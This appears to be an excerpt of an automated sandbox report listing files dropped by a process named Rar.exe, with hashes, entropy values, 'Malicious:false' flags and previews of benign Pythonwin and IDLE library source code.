                                                                                                                                                                                                                                  SHA-512:D51C0CE656C2A2A37DF6FBA135C3E3B9066F42626C722267D38C677D2BD591C6C8AC59CDB4AEBB4FBA444C0AEC9062FE333B598E61062EC6B6A6BD1B0F8F23B4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Extension to format a paragraph..# Does basic, standard text formatting, and also understands Python.# comment blocks. Thus, for editing Python source code, this.# extension is really only suitable for reformatting these comment.# blocks or triple-quoted strings...# Known problems with comment reformatting:.# * If there is a selection marked, and the first line of the.# selection is not complete, the block will probably not be detected.# as comments, and will have the normal "text formatting" rules.# applied..# * If a comment block has leading whitespace that mixes tabs and.# spaces, they will not be considered part of the same block..# * Fancy comments, like this bulleted list, arent handled :-)..import re...class FormatParagraph:. menudefs = [. (. "edit",. [. ("Format Paragraph", "<<format-paragraph>>"),. ],. ). ].. keydefs = {. "<<format-paragraph>>": ["<Alt-q>"],. }.. unix_keydefs = {.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3069
                                                                                                                                                                                                                                  Entropy (8bit):4.1340413851981355
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:WI0VjbvYV2MFTxMYlSqp/sNXQp/A7d/XdifpdUB6zDOngrQ6B+w:7InF2NfjW8A75XdiRdaADOgEs+w
                                                                                                                                                                                                                                  MD5:B815FCA1AF9503A92419F20246D48ABD
                                                                                                                                                                                                                                  SHA1:1CB99DA007989D2EA3269A85486EFF1DAF3D8F2E
                                                                                                                                                                                                                                  SHA-256:BCE4E7E672276D01D69ED79C7ED1D9F5889006AD6B3FBAC602CAC9B355BC0947
                                                                                                                                                                                                                                  SHA-512:619BFF443025CE7D70EF72DC84F1CC68EB3E6F0F80B8A129F132C49C025AD9C9E82D4B0B892B75C789E80CB4FD593A7090747F8D66E135C3F870D87DDDC80B1B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:class History:. def __init__(self, text, output_sep="\n"):. self.text = text. self.history = []. self.history_prefix = None. self.history_pointer = None. self.output_sep = output_sep. text.bind("<<history-previous>>", self.history_prev). text.bind("<<history-next>>", self.history_next).. def history_next(self, event):. self.history_do(0). return "break".. def history_prev(self, event):. self.history_do(1). return "break".. def _get_source(self, start, end):. # Get source code from start index to end index. Lines in the. # text control may be separated by sys.ps2 .. lines = self.text.get(start, end).split(self.output_sep). return "\n".join(lines).. def _put_source(self, where, source):. output = self.output_sep.join(source.split("\n")). self.text.insert(where, output).. def history_do(self, reverse):. nhist = len(self.history). pointer =
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18492
                                                                                                                                                                                                                                  Entropy (8bit):4.094627670715275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:kDSC3LGcWXNFHTMX+G/54PXcbXS/4/2ezRp8CRbJbl31Ia7If5I41e4/IAL3/0kh:kDfq3fpG/5+XcbXS/4/2ezhbJbef5I4V
                                                                                                                                                                                                                                  MD5:2881726294DCF58E56EFB900C5A0F8D3
                                                                                                                                                                                                                                  SHA1:DAB83CA4EC35577579E0DA320A0230D985640A9A
                                                                                                                                                                                                                                  SHA-256:43F04DAAC0C47DCA9A7B2507B1445BA876DEBF73B658F7F62D0A0E44B6666196
                                                                                                                                                                                                                                  SHA-512:C65C12AFA7085229E6C391F1C565087AD09145AD80E5E7D213E1EDEA269202CC695E614126B861EB4F928E8210A88DE75F5FF5C20E775EF4C585B0345720E51E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import re.import string.import sys..# Reason last stmt is continued (or C_NONE if it's not)..C_NONE, C_BACKSLASH, C_STRING, C_BRACKET = list(range(4))..if 0: # for throwaway debugging output.. def dump(*stuff):. sys.__stdout__.write(" ".join(map(str, stuff)) + "\n")...# Find what looks like the start of a popular stmt..._synchre = re.compile(. r""". ^. [ \t]*. (?: if. | for. | while. | else. | def. | return. | assert. | break. | class. | continue. | elif. | try. | except. | raise. | import. ). \b.""",. re.VERBOSE | re.MULTILINE,.).search..# Match blank line or non-indenting comment line..._junkre = re.compile(. r""". [ \t]*. (?: \# \S .* )?. \n.""",. re.VERBOSE,.).match..# Match any flavor of string; the terminating quote is optional.# so that we're robust in the face of incomplete program text..._match_stringre = re.compile(. r""". \""" [^"\\]* (?:.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                  Entropy (8bit):4.162111531234448
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFQyA+AFRGHWkexVWSvn:SbFW+bHWkcVjv
                                                                                                                                                                                                                                  MD5:C2A467B129816CF02C12519E3E45DB0A
                                                                                                                                                                                                                                  SHA1:49D83D6E76EA862B9885CD4E0F4FD721DCF1F79A
                                                                                                                                                                                                                                  SHA-256:44B1DF947FF50D72D59B94198997B704164F45A1CD53FEFA952A8E17E3547F84
                                                                                                                                                                                                                                  SHA-512:AA54B67FB7B539616B131EC081FE27B0C7E3684490C19028226BA37760E6FB63BA7C1D6D814BFFA613C43A0EDAC655EF305CF09EC2A52D88FE916E7BFBD3D602
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file denotes the directory as a Python package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2868
                                                                                                                                                                                                                                  Entropy (8bit):4.593442899717496
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:wIUyrO+52aUrxTZzEkAOQlypxbGb72X95xqqliH2afGjfPYX5DWT4yQl7c8GH9:rUqUrx1RAOtXqeNK8iWaaXYXtU4ySoX9
                                                                                                                                                                                                                                  MD5:33A3FC76024153A2C91464ECF67B48D7
                                                                                                                                                                                                                                  SHA1:B351FE1B5981AC4BC64B310C84ACD913A9FB18CF
                                                                                                                                                                                                                                  SHA-256:786CD903AAD80332EEC07026AA0289776BEBCDE5A8B05086902054D782D46B6A
                                                                                                                                                                                                                                  SHA-512:6853C668A08B4BE27DEA2D2CF6D83F07DCF80AF3BCB398D3183A4983584165ECF7E9BA2EFEB156CA61F93986132AD4900DF18858FDB3BEC9D7B9584212071FF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Support for ActiveX control hosting in Pythonwin..""".import win32ui.import win32uiole..from . import window..# XXX - we are still "classic style" classes in py2x, so we need can't yet.# use 'type()' everywhere - revisit soon, as py2x will move to new-style too....try:. from types import ClassType as new_type.except ImportError:. new_type = type # py3k...class Control(window.Wnd):. """An ActiveX control base class. A new class must be derived from both. this class and the Events class. See the demos for more details.. """.. def __init__(self):. self.__dict__["_dispobj_"] = None. window.Wnd.__init__(self).. def _GetControlCLSID(self):. return self.CLSID.. def _GetDispatchClass(self):. return self.default_interface.. def _GetEventMap(self):. return self.default_source._dispid_to_func_.. def CreateControl(self, windowTitle, style, rect, parent, id, lic_string=None):. clsid = str(self._GetControlCLSID()).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15094
                                                                                                                                                                                                                                  Entropy (8bit):4.777558868848426
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:p9+7gM0XJNbpbCffiskBtXvyhE+RjE5LedEIq0E1G+fe:pJNlCff8yxjE5LI4v1A
                                                                                                                                                                                                                                  MD5:370BEB77C36C0B2E840E6AB850FCE757
                                                                                                                                                                                                                                  SHA1:0A87A029CA417DAA03D22BE6EDDFDDBAC0B54D7A
                                                                                                                                                                                                                                  SHA-256:462659F2891D1D767EA4E7A32FC1DBBD05EC9FCFA9310ECDC0351B68F4C19ED5
                                                                                                                                                                                                                                  SHA-512:4E274071CA052CA0D0EF5297D61D06914F0BFB3161843B3CDCFDE5A2EA0368974FD2209732A4B00A488C84A80A5AB94AD4FD430FF1E4524C6425BAA59E4DA289
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from stdin.TCS_MULTILINE = 0x0200.CBRS_ALIGN_LEFT = 0x1000.CBRS_ALIGN_TOP = 0x2000.CBRS_ALIGN_RIGHT = 0x4000.CBRS_ALIGN_BOTTOM = 0x8000.CBRS_ALIGN_ANY = 0xF000.CBRS_BORDER_LEFT = 0x0100.CBRS_BORDER_TOP = 0x0200.CBRS_BORDER_RIGHT = 0x0400.CBRS_BORDER_BOTTOM = 0x0800.CBRS_BORDER_ANY = 0x0F00.CBRS_TOOLTIPS = 0x0010.CBRS_FLYBY = 0x0020.CBRS_FLOAT_MULTI = 0x0040.CBRS_BORDER_3D = 0x0080.CBRS_HIDE_INPLACE = 0x0008.CBRS_SIZE_DYNAMIC = 0x0004.CBRS_SIZE_FIXED = 0x0002.CBRS_FLOATING = 0x0001.CBRS_GRIPPER = 0x00400000.CBRS_ORIENT_HORZ = CBRS_ALIGN_TOP | CBRS_ALIGN_BOTTOM.CBRS_ORIENT_VERT = CBRS_ALIGN_LEFT | CBRS_ALIGN_RIGHT.CBRS_ORIENT_ANY = CBRS_ORIENT_HORZ | CBRS_ORIENT_VERT.CBRS_ALL = 0xFFFF.CBRS_NOALIGN = 0x00000000.CBRS_LEFT = CBRS_ALIGN_LEFT | CBRS_BORDER_RIGHT.CBRS_TOP = CBRS_ALIGN_TOP | CBRS_BORDER_BOTTOM.CBRS_RIGHT = CBRS_ALIGN_RIGHT | CBRS_BORDER_LEFT.CBRS_BOTTOM = CBRS_ALIGN_BOTTOM | CBRS_BORDER_TOP.SBPS_NORMAL = 0x0000.SBPS_NOBORDERS = 0x0100.SBPS_POPOUT = 0x0200.SB
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9002
                                                                                                                                                                                                                                  Entropy (8bit):4.653477006452847
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:tmY8+q9G2PjQnqrLsDsOqDs+Yg0Mxpb0Xh4hwWIc:tmEwG2PjQnqs6Nih47
                                                                                                                                                                                                                                  MD5:12BC3CDBB2F36846A76A43060AFB93DA
                                                                                                                                                                                                                                  SHA1:94BB0F8D3EFCC2873BEEA25253551696662DDDFC
                                                                                                                                                                                                                                  SHA-256:1343399262F87394D38ADCCB5C6A2A7B999C41FC48AFD4D1F890140DB250F2D9
                                                                                                                                                                                                                                  SHA-512:57C7855DFA87487F55DB9D5D312CE89827B5E9F26642FC89A59F5B389E16D777F5CD49D07ACC67CF9578E36BF56C11097062E7180CB2C8C785DF1BE53AEBFBB6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" \.Base class for Dialogs. Also contains a few useful utility functions.""".# dialog.py.# Python class for Dialog Boxes in PythonWin...import win32con.import win32ui..# sob - 2to3 doesn't see this as a relative import :(.from pywin.mfc import window...def dllFromDll(dllid):. "given a 'dll' (maybe a dll, filename, etc), return a DLL object". if dllid == None:. return None. elif type("") == type(dllid):. return win32ui.LoadLibrary(dllid). else:. try:. dllid.GetFileName(). except AttributeError:. raise TypeError("DLL parameter must be None, a filename or a dll object"). return dllid...class Dialog(window.Wnd):. "Base class for a dialog".. def __init__(self, id, dllid=None):. """id is the resource ID, or a template. dllid may be None, a dll object, or a string with a dll name""". # must take a reference to the DLL until InitDialog.. self.dll = dllFromDll(dllid). if type(id) ==
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4089
                                                                                                                                                                                                                                  Entropy (8bit):4.654928602298063
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:tqu76lDV5Kb5/65Ab5i5PSbnrmAY3UrrWEnSSiWsYVBvw+XuMWwJYMExXNO:dExNO
                                                                                                                                                                                                                                  MD5:8791456FD7D550ECF2F6D9A49EBB55E5
                                                                                                                                                                                                                                  SHA1:6617C832DE99E3566A83B38640BF9C36B8908BA9
                                                                                                                                                                                                                                  SHA-256:30EAC40A598F11C20A0BA1008674651070D4FF7CC621F16F57C598D8CDBA52D9
                                                                                                                                                                                                                                  SHA-512:75C9DAE3DEDCBA988B5708AEB9DB717449F0BFAEB4916A2F0E1EC478CDC0EDEC57F52852693DD1140745C91C523F64AF154651E7F5DBE2F07A630826E5752627
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# document and view classes for MFC..import win32ui..from . import object, window...class View(window.Wnd):. def __init__(self, initobj):. window.Wnd.__init__(self, initobj).. def OnInitialUpdate(self):. pass...# Simple control based views..class CtrlView(View):. def __init__(self, doc, wndclass, style=0):. View.__init__(self, win32ui.CreateCtrlView(doc, wndclass, style))...class EditView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateEditView(doc))...class RichEditView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateRichEditView(doc))...class ListView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateListView(doc))...class TreeView(CtrlView):. def __init__(self, doc):. View.__init__(self, win32ui.CreateTreeView(doc))...# Other more advanced views..class ScrollView(View):. def __init__(self, doc):. View.__init__(self, win32ui.CreateView(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2179
                                                                                                                                                                                                                                  Entropy (8bit):4.386077735543855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:qAibk/bJALTEZu2CSfkN3KylseLVWLLNHLIKaNBKANAFG9bxIXGEs9bxI8EUds9h:qhA/t6n2CEeakP4TnEcGUGNz9dsR6C
                                                                                                                                                                                                                                  MD5:BE71EA2BF0C288E3AA3A2E30C08DF3E5
                                                                                                                                                                                                                                  SHA1:40E4B56C7DFF8623572D639D944C096C84E8B8F8
                                                                                                                                                                                                                                  SHA-256:2BB20C2218306A176B063BC860092852EA94186F385815F3E07388033CC69F1A
                                                                                                                                                                                                                                  SHA-512:A0DDA0B0A790E385FB0BE69659FB97D9645A3208C08E07400284C81F5CACE190AD115DAC8350133BA445E53AC0AFD686980274A70148CF376D46AAB3D9CF4784
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# MFC base classes...import win32ui...class Object:. def __init__(self, initObj=None):. self.__dict__["_obj_"] = initObj. # ..self._obj_ = initObj. if initObj is not None:. initObj.AttachObject(self).. def __del__(self):. self.close().. def __getattr__(. self, attr. ): # Make this object look like the underlying win32ui one.. # During cleanup __dict__ is not available, causing recursive death.. if not attr.startswith("__"):. try:. o = self.__dict__["_obj_"]. if o is not None:. return getattr(o, attr). # Only raise this error for non "internal" names -. # Python may be calling __len__, __nonzero__, etc, so. # we dont want this exception. if attr[0] != "_" and attr[-1] != "_":. raise win32ui.error("The MFC object has died."). except KeyError:. # No _obj_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):588
                                                                                                                                                                                                                                  Entropy (8bit):4.556501995844858
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:GIALHr171Ap0ZbZMiQlApOAgab6QAtqI1Ap9wyCeVAApn:G/1hAiZbZMiQlA9biqMAoyCKAAd
                                                                                                                                                                                                                                  MD5:CFE2192D3AEFC770DCF8AF46489267F6
                                                                                                                                                                                                                                  SHA1:7FE1659F61EA201667A114911ECBBE08DC9667D4
                                                                                                                                                                                                                                  SHA-256:CA5B09C8E52F81F206DC58C631605F915229B034038C7900B527E3DD7CF3AB33
                                                                                                                                                                                                                                  SHA-512:9A6BF373CFA64D3F3A96CB228DA1EA15F9CB6E5D9106515BB6AEE9E8C5C4E406142199636FA07C44AFFC25A7D704CBDCC7BF0C3745E0BC40DE7850C25B6F97F8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Thread and application objects..import win32ui..from . import object...class WinThread(object.CmdTarget):. def __init__(self, initObj=None):. if initObj is None:. initObj = win32ui.CreateThread(). object.CmdTarget.__init__(self, initObj).. def InitInstance(self):. pass # Default None/0 return indicates success for InitInstance().. def ExitInstance(self):. pass...class WinApp(WinThread):. def __init__(self, initApp=None):. if initApp is None:. initApp = win32ui.GetApp(). WinThread.__init__(self, initApp).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1499
                                                                                                                                                                                                                                  Entropy (8bit):4.791197957899837
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Llv9hACilAbMkpo3m71f93B4/U/9qR/MZRlTph2XJhWv7AnAf1UcAOwAJMAfF0HY:lDBUk71fgqoR0ZR45W7E8UcpbJMDHYX/
                                                                                                                                                                                                                                  MD5:C6FAA92255CC9C8FB700A0F740E41762
                                                                                                                                                                                                                                  SHA1:AA1CB1637DD14BBDA6392E1CB7FBFD5C20F01AF4
                                                                                                                                                                                                                                  SHA-256:9A970EB30140B49C4A41A18FF5B415DAA1D72867D4FB16302E3705272A238E3B
                                                                                                                                                                                                                                  SHA-512:1EF564380ECF3773F5935A3F29D61A7711E7187733092F227B6468D759C6CF40653BE8F7B364898AE9D2B5C052DCB5F8441D59D8EC8196004ECD8A3CD3619A2C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# The MFCish window classes..import win32con.import win32ui..from . import object...class Wnd(object.CmdTarget):. def __init__(self, initobj=None):. object.CmdTarget.__init__(self, initobj). if self._obj_:. self._obj_.HookMessage(self.OnDestroy, win32con.WM_DESTROY).. def OnDestroy(self, msg):. pass...# NOTE NOTE - This facility is currently disabled in Pythonwin!!!!!.# Note - to process all messages for your window, add the following method.# to a derived class. This code provides default message handling (ie, is.# identical, except presumably in speed, as if the method did not exist at.# all, so presumably will be modified to test for specific messages to be.# useful!.# .def WindowProc(self, msg, wParam, lParam):.# ..rc, lResult = self._obj_.OnWndMsg(msg, wParam, lParam).# ..if not rc: lResult = self._obj_.DefWindowProc(msg, wParam, lParam).# ..return lResult...class FrameWnd(Wnd):. def __init__(self, wnd):. Wnd.__init__(self, wnd)...c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19556
                                                                                                                                                                                                                                  Entropy (8bit):4.497661683256965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:8q8UCTL5cBIPkuH31nfeOy2qjT+jQu/MA6eE5vSIaKKrTH/ZD/XUFrKK/So4e2ve:8rUsF/fUQ/PfEzihzXnKz4pvdelM0SFk
                                                                                                                                                                                                                                  MD5:30649C93971721EFE505F0A6938C339E
                                                                                                                                                                                                                                  SHA1:300BCF617E09E262C3CC32B736B721D701F5D1C9
                                                                                                                                                                                                                                  SHA-256:F7D11254FBB78D58C665E80B3A360AB72C2D8513C118E2EF3D4EB180C0FB0404
                                                                                                                                                                                                                                  SHA-512:165B1ED569A6FBF9E774C1A7E64BEB919073B312C2E0AA9E7CB56D742C6B8CAFFBDB927BCC2759D1A040D9B5C41846906DDF9A268F1E93C3AD6FE16442261E25
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Code that allows Pythonwin to pretend it is IDLE.# (at least as far as most IDLE extensions are concerned)..import string.import sys..import win32api.import win32con.import win32ui.from pywin import default_scintilla_encoding.from pywin.mfc.dialog import GetSimpleInput..wordchars = string.ascii_uppercase + string.ascii_lowercase + string.digits...class TextError(Exception): # When a TclError would normally be raised.. pass...class EmptyRange(Exception): # Internally raised.. pass...def GetIDLEModule(module):. try:. # First get it from Pythonwin it is exists.. modname = "pywin.idle." + module. __import__(modname). except ImportError as details:. msg = (. "The IDLE extension '%s' can not be located.\r\n\r\n". "Please correct the installation and restart the". " application.\r\n\r\n%s" % (module, details). ). win32ui.MessageBox(msg). return None. mod = sys.modules[modname]. mod.TclError
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6001
                                                                                                                                                                                                                                  Entropy (8bit):4.567243978762066
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:BU0On+MU9hSodi81OFpGNe+TpY7xgyfsuffaUhTbWrqSz8t937bad2iPjz80JoUe:GWy4azmiL+Mi8w4
                                                                                                                                                                                                                                  MD5:4D63B46F085EDD1B3F26492C060BE02F
                                                                                                                                                                                                                                  SHA1:492669F778D75AB612251026C0857529237910F2
                                                                                                                                                                                                                                  SHA-256:DABDFAA846E98F4B0CE096518E120A8DDBBB8410796D6D9D88143253AF0995A8
                                                                                                                                                                                                                                  SHA-512:FFDA160E7D8890E92E546688E720B7B742F803B2847D766EC0C652980296F8E883F0214831964B45BF2798D55EBF92D0133B8530FD57EFEB3C3604DC00DB60CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import traceback..import win32api.import win32con.import win32ui..from . import IDLEenvironment, keycodes..HANDLER_ARGS_GUESS = 0.HANDLER_ARGS_NATIVE = 1.HANDLER_ARGS_IDLE = 2.HANDLER_ARGS_EXTENSION = 3..next_id = 5000..event_to_commands = {} # dict of integer IDs to event names..command_to_events = {} # dict of event names to int IDs...def assign_command_id(event, id=0):. global next_id. if id == 0:. id = event_to_commands.get(event, 0). if id == 0:. id = next_id. next_id = next_id + 1. # Only map the ones we allocated - specified ones are assumed to have a handler. command_to_events[id] = event. event_to_commands[event] = id. return id...class SendCommandHandler:. def __init__(self, cmd):. self.cmd = cmd.. def __call__(self, *args):. win32ui.GetMainFrame().SendMessage(win32con.WM_COMMAND, self.cmd)...class Binding:. def __init__(self, handler, handler_args_type):. self.handler = handler.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12462
                                                                                                                                                                                                                                  Entropy (8bit):4.140685505289245
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:3eNXZMJrwYuoMtcYFnPs3o0yKbNIllpQbXi44yamr83IoXNh5CBR/OX:3sXZSwKu0nuXSOHbay
                                                                                                                                                                                                                                  MD5:A3B4EA466176089EB9A997B7A42080B4
                                                                                                                                                                                                                                  SHA1:7C308DA4113AF4AB5C915D5D03E876B1405BF298
                                                                                                                                                                                                                                  SHA-256:FE72E043C6DD33F7DA48B20AA3DDE5B9720D9B8053FB8B6AE647A42E80DFFE69
                                                                                                                                                                                                                                  SHA-512:A3F6023BC2970BE7508BFC569060464B952E84FF889E100D5ACDA7DAF096B79EB4DCF0AAFE3F4AAC7699513881D09C22C08683CF61EC0BC105C6A2E738A4F89D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# config.py - deals with loading configuration information...# Loads config data from a .cfg file. Also caches the compiled.# data back into a .cfc file...# If you are wondering how to avoid needing .cfg files (eg,.# if you are freezing Pythonwin etc) I suggest you create a.# .py file, and put the config info in a docstring. Then.# pass a CStringIO file (rather than a filename) to the.# config manager..import glob.import importlib.util.import marshal.import os.import stat.import sys.import traceback.import types..import pywin.import win32api..from . import keycodes..debugging = 0.if debugging:. import win32traceutil # Some trace statements fire before the interactive window is open... def trace(*args):. sys.stderr.write(" ".join(map(str, args)) + "\n")..else:. trace = lambda *args: None..compiled_config_version = 3...def split_line(line, lineno):. comment_pos = line.find("#"). if comment_pos >= 0:. line = line[:comment_pos]. sep_pos = line.rfind("=").
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11205
                                                                                                                                                                                                                                  Entropy (8bit):4.821865216685485
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:XfMdKQOJagYIqGwYCfjr3Igem/I4dHqYKNt4SeiQSQe1HY7b5dSYlJLoe1jGeFgx:XkMkImIFAs1gnPLoU6p6+
                                                                                                                                                                                                                                  MD5:CBE37DC6081DCCCAB596CC4174B049A8
                                                                                                                                                                                                                                  SHA1:6CED1ED7EBB1E74502315B16951AC7D7CD7C0136
                                                                                                                                                                                                                                  SHA-256:0FA2FA6B662FC92DB265DF581E8A6CFC89B977761817A729B63BCF521A351692
                                                                                                                                                                                                                                  SHA-512:CF3C72CACBDF3E606DD9DF96FEFBD973BEFAF4D3A16FF3CA81B8DC40B447F8A16EA2E7BBDCA30E6766C9835A44BD93E0D4A294EF256AF18F176AB01FDF5D4181
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32ui.from pywin.mfc import dialog..# Used to indicate that style should use default color.from win32con import CLR_INVALID..from . import scintillacon..######################################################.# Property Page for syntax formatting options..# The standard 16 color VGA palette should always be possible.paletteVGA = (. ("Black", win32api.RGB(0, 0, 0)),. ("Navy", win32api.RGB(0, 0, 128)),. ("Green", win32api.RGB(0, 128, 0)),. ("Cyan", win32api.RGB(0, 128, 128)),. ("Maroon", win32api.RGB(128, 0, 0)),. ("Purple", win32api.RGB(128, 0, 128)),. ("Olive", win32api.RGB(128, 128, 0)),. ("Gray", win32api.RGB(128, 128, 128)),. ("Silver", win32api.RGB(192, 192, 192)),. ("Blue", win32api.RGB(0, 0, 255)),. ("Lime", win32api.RGB(0, 255, 0)),. ("Aqua", win32api.RGB(0, 255, 255)),. ("Red", win32api.RGB(255, 0, 0)),. ("Fuchsia", win32api.RGB(255, 0, 255)),. ("Yellow", win32api.RGB(255, 255, 0)),. ("White
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20451
                                                                                                                                                                                                                                  Entropy (8bit):4.87683613229855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:fYn+8crQpwpUQDvR0dYWNQMCQrzchIxGml+Bkhrdxaloyp61ZC5Nm5:wJcrFvR0Wp7QPnv+BkhrdxJ25Q5
                                                                                                                                                                                                                                  MD5:751CFD7DFE3C718847F3726B1763ECBD
                                                                                                                                                                                                                                  SHA1:AD3E5B090323C9E40FAA4F61401E43CD09781526
                                                                                                                                                                                                                                  SHA-256:42BAAB81F5657703CF5203687BC0608FA47763691ECBA0330D4A716ACFB185CD
                                                                                                                                                                                                                                  SHA-512:097BFE19E1FD9D1198DCE6C91E28237EED7C30C232372C47C619677EEE8ABADFC26D015E5638AA48A0235CD0A3E0D15257B370D1D8D67D5571AB01EEA596F2F2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# An Python interface to the Scintilla control..#.# Exposes Python classes that allow you to use Scintilla as.# a "standard" MFC edit control (eg, control.GetTextLength(), control.GetSel().# plus many Scintilla specific features (eg control.SCIAddStyledText())..import array.import os.import struct..import win32api.import win32con.import win32ui.from pywin import default_scintilla_encoding.from pywin.mfc import window..from . import scintillacon..# Load Scintilla.dll to get access to the control..# We expect to find this in the same directory as win32ui.pyd.dllid = None.if win32ui.debug: # If running _d version of Pythonwin.... try:. dllid = win32api.LoadLibrary(. os.path.join(os.path.split(win32ui.__file__)[0], "Scintilla_d.DLL"). ). except (. win32api.error. ): # Not there - we dont _need_ a debug ver, so ignore this error.. pass.if dllid is None:. try:. dllid = win32api.LoadLibrary(. os.path.join(os.path.split(win
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11468
                                                                                                                                                                                                                                  Entropy (8bit):4.53438787213757
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:569gsArInvW2tgKfCFtbwt+WisHAtbJwqxavtjdTgRkzLv0PC/C/C2NCNyG3hNVx:5u4CWwbiXtbWqxUtQA33hNVVbEiqS
